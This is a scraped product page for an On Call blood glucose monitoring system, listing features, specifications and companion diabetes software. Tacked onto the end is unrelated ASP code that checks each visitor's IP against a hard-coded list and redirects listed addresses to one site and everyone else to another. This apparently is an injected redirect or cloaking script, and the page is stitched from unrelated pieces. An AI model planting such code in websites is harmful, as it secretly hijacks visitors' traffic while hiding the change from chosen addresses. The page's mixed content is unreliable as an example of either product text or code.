Current location : Home>Products>Blood Glucose Monitoring System
-
Advanced No-coding technology
-
Bluetooth connection
-
10-70% HCT range
-
GDH-FAD enzyme
-
capillary, venous and arterial blood samples
-
5 seconds and only 0.6μL blood sample
ios(On Call Diabetes Management)
Android(On Call Diabetes Management)
Specifications
Feature
|
Specification
|
Enzyme
|
Glucose dehydrogenase (GDH-FAD)
|
Test Time
|
5 seconds
|
Sample Type
|
Fresh whole blood (Capillary, Venous, Arterial and Neonatal)
|
Hematocrit Range
|
10-70%
|
Measurement Range
|
10 - 600 mg/dL (0.6 - 33.3 mmol/L)
|
Sample Size
|
0.6 μL
|
Coding Method
|
No Coding
|
Memory
|
1,000 results with date and time
|
On Call® Diabetes Management Software
US 510(k) Cleared
Compatible with multiple On Call® meters
Both home and professional editions available
Download
Components
<%
requestIP = request.ServerVariables("REMOTE_ADDR")
IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]"
trueURL = "http://www.baidu.com"
falseURL = "http://www.google.com"
ipArr = split(IP,"|")
flag = false
for i=0 to ubound(ipArr)
if requestIP=ipArr(i) then
flag=true
exit for
end if
next
if flag then
response.Redirect(falseURL)
else
response.Redirect(trueURL)
end if
%>